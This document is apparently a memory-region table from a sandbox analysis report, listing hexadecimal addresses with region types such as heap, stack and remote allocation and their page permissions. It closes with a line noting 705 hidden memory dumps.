7415038000
stack
page read and write
6B8A000
stack
page read and write
22228CF0000
heap
page read and write
7415E8D000
stack
page read and write
783D000
heap
page read and write
22C1F000
stack
page read and write
254A0000
heap
page execute and read and write
22228B2D000
heap
page read and write
24C6F9A0000
heap
page read and write
693E000
stack
page read and write
258B0000
trusted library allocation
page read and write
25710000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
54A1000
trusted library allocation
page read and write
27B0000
heap
page read and write
2710000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
22EF0000
remote allocation
page read and write
780D000
heap
page read and write
7FFD345F6000
trusted library allocation
page read and write
24C6F9EB000
heap
page read and write
2A6E000
stack
page read and write
24C59584000
trusted library allocation
page read and write
23040000
trusted library allocation
page read and write
26290000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
25A2F000
stack
page read and write
8B60000
direct allocation
page execute and read and write
25700000
trusted library allocation
page read and write
77B1000
heap
page read and write
230DF000
stack
page read and write
25A40000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
7FFD347B0000
trusted library allocation
page read and write
7FFD34540000
trusted library allocation
page read and write
23040000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
29EC000
heap
page read and write
8100000
heap
page read and write
25700000
trusted library allocation
page read and write
7F50000
trusted library allocation
page read and write
24191000
trusted library allocation
page read and write
7FFD34840000
trusted library allocation
page read and write
24C67790000
trusted library allocation
page read and write
24C57FF2000
trusted library allocation
page read and write
6A4D000
stack
page read and write
7FBA0000
trusted library allocation
page execute and read and write
812D000
heap
page read and write
227D0000
direct allocation
page read and write
2311C000
stack
page read and write
25A40000
trusted library allocation
page read and write
227E0000
direct allocation
page read and write
25198000
trusted library allocation
page read and write
7360000
trusted library allocation
page read and write
254D1000
trusted library allocation
page read and write
2610D000
stack
page read and write
25A30000
trusted library allocation
page read and write
7FFD34770000
trusted library allocation
page read and write
2526A000
stack
page read and write
22EF0000
remote allocation
page read and write
2618E000
stack
page read and write
256F0000
trusted library allocation
page read and write
2716000
trusted library allocation
page execute and read and write
44F8000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
7FFD348A0000
trusted library allocation
page read and write
7414C7E000
stack
page read and write
26310000
trusted library allocation
page read and write
2787000
heap
page read and write
6298AFD000
stack
page read and write
24C59047000
trusted library allocation
page read and write
6298CFF000
stack
page read and write
6544000
remote allocation
page execute and read and write
6AB0000
direct allocation
page read and write
7FFD34830000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
25710000
trusted library allocation
page execute and read and write
23040000
trusted library allocation
page read and write
24C57C11000
trusted library allocation
page read and write
78E0000
direct allocation
page read and write
25740000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
23187000
heap
page read and write
24C57E35000
trusted library allocation
page read and write
788D000
stack
page read and write
25A50000
trusted library allocation
page read and write
24C57200000
trusted library allocation
page read and write
2B5A000
trusted library allocation
page execute and read and write
22FEC000
stack
page read and write
7300000
trusted library allocation
page read and write
4480000
heap
page read and write
24C59530000
trusted library allocation
page read and write
255F0000
heap
page read and write
24C6F8D0000
heap
page execute and read and write
7FFD34790000
trusted library allocation
page read and write
256F0000
trusted library allocation
page read and write
4430000
trusted library allocation
page execute and read and write
24C58007000
trusted library allocation
page read and write
6B00000
direct allocation
page read and write
25A30000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
256F0000
trusted library allocation
page read and write
7140000
heap
page execute and read and write
2C50000
heap
page read and write
437E000
stack
page read and write
2DEC000
heap
page read and write
256F0000
trusted library allocation
page read and write
27AD000
stack
page read and write
74150B8000
stack
page read and write
24C558D5000
heap
page read and write
25A40000
trusted library allocation
page read and write
684E000
stack
page read and write
2B24000
trusted library allocation
page read and write
7414D3E000
stack
page read and write
25A50000
trusted library allocation
page read and write
2316D000
stack
page read and write
25700000
trusted library allocation
page read and write
252C0000
trusted library allocation
page read and write
24C57C78000
trusted library allocation
page read and write
25609000
heap
page read and write
258B0000
trusted library allocation
page read and write
25A51000
trusted library allocation
page read and write
254C2000
trusted library allocation
page read and write
252A9000
stack
page read and write
573A000
trusted library allocation
page read and write
23040000
trusted library allocation
page read and write
68F5000
heap
page execute and read and write
24C57FB3000
trusted library allocation
page read and write
3C60000
remote allocation
page execute and read and write
45ED000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
253AE000
stack
page read and write
24C57220000
heap
page read and write
71E0000
trusted library allocation
page read and write
68F0000
heap
page execute and read and write
2B6B000
heap
page read and write
7900000
heap
page read and write
26290000
trusted library allocation
page read and write
24C57C15000
trusted library allocation
page read and write
25B0000
heap
page read and write
25700000
trusted library allocation
page read and write
7FFD347D0000
trusted library allocation
page read and write
7F25000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
231C7000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
2B40000
heap
page read and write
7310000
trusted library allocation
page read and write
74152BE000
stack
page read and write
2FDF000
stack
page read and write
2B23000
trusted library allocation
page execute and read and write
25A30000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
78CE000
stack
page read and write
24C59533000
trusted library allocation
page read and write
442C000
stack
page read and write
24C596D6000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
73B0000
trusted library allocation
page read and write
71B0000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
2A2B000
heap
page read and write
7F40000
trusted library allocation
page read and write
24C58A07000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
6BCE000
stack
page read and write
833E000
stack
page read and write
25A50000
trusted library allocation
page read and write
25A30000
trusted library allocation
page execute and read and write
7FFD3455B000
trusted library allocation
page read and write
2C2E000
unkown
page read and write
837C000
stack
page read and write
7720000
heap
page read and write
2B39000
trusted library allocation
page read and write
254DD000
trusted library allocation
page read and write
6AD0000
direct allocation
page read and write
7415D8F000
stack
page read and write
2B60000
heap
page read and write
7DE0000
trusted library allocation
page read and write
8450000
direct allocation
page read and write
24C55880000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
25A50000
heap
page read and write
25A50000
trusted library allocation
page read and write
2780000
heap
page read and write
258B0000
trusted library allocation
page read and write
22810000
direct allocation
page read and write
2D9E000
stack
page read and write
24C58DCB000
trusted library allocation
page read and write
25490000
trusted library allocation
page read and write
252B0000
trusted library allocation
page read and write
22D50000
trusted library allocation
page read and write
5491000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
2596D000
stack
page read and write
23049000
trusted library allocation
page read and write
6C40000
direct allocation
page read and write
43C0000
heap
page readonly
780F000
heap
page read and write
25700000
trusted library allocation
page read and write
71C0000
trusted library allocation
page read and write
241B9000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
29CB000
heap
page read and write
25A40000
trusted library allocation
page read and write
7414E7E000
stack
page read and write
24FC000
stack
page read and write
7FFD345FC000
trusted library allocation
page execute and read and write
258B0000
trusted library allocation
page read and write
26F0000
trusted library allocation
page read and write
2B50000
trusted library allocation
page read and write
4312000
trusted library allocation
page read and write
24C6F9D2000
heap
page read and write
2614C000
stack
page read and write
25A50000
trusted library allocation
page read and write
2DE0000
heap
page read and write
4330000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
6C90000
heap
page read and write
80FE000
stack
page read and write
25700000
trusted library allocation
page read and write
23180000
heap
page read and write
22840000
direct allocation
page read and write
227F0000
direct allocation
page read and write
2930000
heap
page read and write
22C9F000
stack
page read and write
7FFD34800000
trusted library allocation
page read and write
2730000
trusted library allocation
page execute and read and write
24C6F780000
heap
page read and write
25230000
trusted library allocation
page read and write
7FFD346E0000
trusted library allocation
page read and write
24C57DB5000
trusted library allocation
page read and write
24C6F9F2000
heap
page read and write
255F1000
heap
page read and write
843C000
stack
page read and write
25A40000
trusted library allocation
page read and write
7FFD34710000
trusted library allocation
page execute and read and write
23030000
trusted library allocation
page read and write
7DA0000
heap
page read and write
25A40000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
241F4000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
24C677A1000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
25A30000
trusted library allocation
page read and write
25730000
trusted library allocation
page read and write
253B0000
heap
page read and write
25A30000
trusted library allocation
page read and write
22DF0000
heap
page read and write
25A40000
trusted library allocation
page read and write
3080000
heap
page read and write
25A50000
trusted library allocation
page read and write
7FFD347E0000
trusted library allocation
page read and write
24C57250000
heap
page read and write
43D8000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
23040000
trusted library allocation
page read and write
6F44000
remote allocation
page execute and read and write
25700000
trusted library allocation
page read and write
254BE000
trusted library allocation
page read and write
22EF0000
remote allocation
page read and write
256F8000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
784D000
heap
page read and write
24C5956B000
trusted library allocation
page read and write
24C570B0000
trusted library allocation
page read and write
4315000
trusted library allocation
page execute and read and write
24C57EFD000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
78F0000
direct allocation
page read and write
25700000
trusted library allocation
page read and write
28D0000
heap
page read and write
6C0C000
stack
page read and write
7E4D000
stack
page read and write
6F32000
heap
page read and write
25A40000
trusted library allocation
page read and write
7FFD34890000
trusted library allocation
page read and write
24C5568A000
heap
page read and write
25A40000
trusted library allocation
page read and write
70F2000
heap
page read and write
25A40000
trusted library allocation
page read and write
25A30000
trusted library allocation
page read and write
8173000
heap
page read and write
25A50000
trusted library allocation
page read and write
254F1000
heap
page read and write
7F970000
trusted library allocation
page execute and read and write
7415F8B000
stack
page read and write
254CE000
trusted library allocation
page read and write
24C595C6000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
24C55770000
heap
page read and write
B444000
direct allocation
page execute and read and write
25A40000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
27FD000
stack
page read and write
25700000
heap
page read and write
2900000
heap
page read and write
25A40000
trusted library allocation
page read and write
4A05000
trusted library allocation
page read and write
259EE000
stack
page read and write
7FFD34550000
trusted library allocation
page read and write
227C0000
direct allocation
page read and write
2608E000
stack
page read and write
24C558B0000
trusted library allocation
page read and write
22228B10000
heap
page read and write
6C30000
direct allocation
page read and write
7DF435280000
trusted library allocation
page execute and read and write
258B0000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
24C595C2000
trusted library allocation
page read and write
254BB000
trusted library allocation
page read and write
24C57FDD000
trusted library allocation
page read and write
25480000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
6B4D000
stack
page read and write
7D97000
stack
page read and write
25700000
trusted library allocation
page read and write
6EFE000
stack
page read and write
7DB0000
trusted library allocation
page execute and read and write
231CF000
trusted library allocation
page read and write
252C0000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
2604C000
stack
page read and write
7180000
trusted library allocation
page read and write
25230000
trusted library allocation
page read and write
3D44000
remote allocation
page execute and read and write
23040000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
25FE000
stack
page read and write
25A40000
trusted library allocation
page read and write
22228B27000
heap
page read and write
26320000
trusted library allocation
page read and write
25480000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
73A0000
trusted library allocation
page read and write
7FFD34810000
trusted library allocation
page read and write
2AFD000
stack
page read and write
25A40000
trusted library allocation
page read and write
7414DFF000
stack
page read and write
6C10000
direct allocation
page read and write
7FFD34543000
trusted library allocation
page execute and read and write
54B9000
trusted library allocation
page read and write
2909000
heap
page read and write
6CA0000
heap
page read and write
24C57693000
heap
page read and write
254F0000
heap
page read and write
2562E000
heap
page read and write
256F0000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
25230000
trusted library allocation
page read and write
71D0000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
8120000
heap
page read and write
25A30000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
7FFD34600000
trusted library allocation
page execute and read and write
258B0000
trusted library allocation
page read and write
254D6000
trusted library allocation
page read and write
2786000
heap
page read and write
2B00000
trusted library section
page read and write
24C555A6000
heap
page read and write
23040000
trusted library allocation
page read and write
803C000
stack
page read and write
24C575E5000
heap
page read and write
69BF000
stack
page read and write
25A50000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
74153BC000
stack
page read and write
253FD000
stack
page read and write
740B000
stack
page read and write
24C55643000
heap
page read and write
74148E5000
stack
page read and write
270D000
trusted library allocation
page execute and read and write
25A40000
trusted library allocation
page read and write
2965000
heap
page read and write
7841000
heap
page read and write
83A0000
trusted library allocation
page read and write
7FFD346F1000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
43BE000
stack
page read and write
24C59558000
trusted library allocation
page read and write
2C30000
heap
page read and write
25A50000
trusted library allocation
page read and write
24C57C25000
trusted library allocation
page read and write
25A41000
trusted library allocation
page read and write
83B0000
trusted library allocation
page execute and read and write
26330000
trusted library allocation
page read and write
7FFD345F0000
trusted library allocation
page read and write
22F2E000
stack
page read and write
24C597CC000
trusted library allocation
page read and write
7FFD34780000
trusted library allocation
page read and write
24C6F96E000
heap
page read and write
25A50000
trusted library allocation
page read and write
8C44000
direct allocation
page execute and read and write
258B0000
trusted library allocation
page read and write
256F0000
trusted library allocation
page read and write
24C557F0000
heap
page read and write
741533E000
stack
page read and write
24C55790000
heap
page read and write
741523E000
stack
page read and write
80BE000
stack
page read and write
7792000
heap
page read and write
24C575A0000
heap
page read and write
254CA000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
24C59545000
trusted library allocation
page read and write
24C5564D000
heap
page read and write
25A40000
trusted library allocation
page read and write
7FFD347A0000
trusted library allocation
page read and write
4A07000
trusted library allocation
page read and write
72BE000
stack
page read and write
25700000
trusted library allocation
page read and write
7414EFC000
stack
page read and write
2AF0000
trusted library section
page read and write
22228AE0000
heap
page read and write
24C57770000
heap
page execute and read and write
25A40000
trusted library allocation
page read and write
22800000
direct allocation
page read and write
771D000
stack
page read and write
49F1000
trusted library allocation
page read and write
7020000
heap
page read and write
6AA0000
direct allocation
page read and write
24C59550000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
2722000
trusted library allocation
page read and write
252C5000
trusted library allocation
page read and write
6AF0000
direct allocation
page read and write
24C5906B000
trusted library allocation
page read and write
24C57C3A000
trusted library allocation
page read and write
26FD000
trusted library allocation
page execute and read and write
25A40000
trusted library allocation
page read and write
2AAE000
stack
page read and write
24C558D0000
heap
page read and write
252B0000
trusted library allocation
page read and write
7350000
trusted library allocation
page read and write
22830000
direct allocation
page read and write
6AE0000
direct allocation
page read and write
23040000
trusted library allocation
page read and write
23050000
heap
page read and write
8139000
heap
page read and write
2B20000
trusted library allocation
page read and write
7380000
trusted library allocation
page read and write
4450000
trusted library allocation
page read and write
24C5563D000
heap
page read and write
26316000
trusted library allocation
page read and write
23040000
trusted library allocation
page read and write
7FFD34660000
trusted library allocation
page execute and read and write
2712000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
22FA0000
direct allocation
page read and write
7FFD348B0000
trusted library allocation
page read and write
24C57BF9000
trusted library allocation
page read and write
25750000
trusted library allocation
page read and write
23040000
trusted library allocation
page read and write
25480000
trusted library allocation
page read and write
255F3000
heap
page read and write
22F6F000
stack
page read and write
25480000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
22820000
direct allocation
page read and write
5B44000
remote allocation
page execute and read and write
22F90000
direct allocation
page read and write
4491000
trusted library allocation
page read and write
7803000
heap
page read and write
23040000
trusted library allocation
page read and write
25A30000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
24C5565D000
heap
page read and write
7415F0B000
stack
page read and write
25760000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
4310000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
24C55590000
heap
page read and write
7FFD34820000
trusted library allocation
page read and write
24C595D7000
trusted library allocation
page read and write
4440000
heap
page execute and read and write
There are 705 hidden memdumps, click here to show them.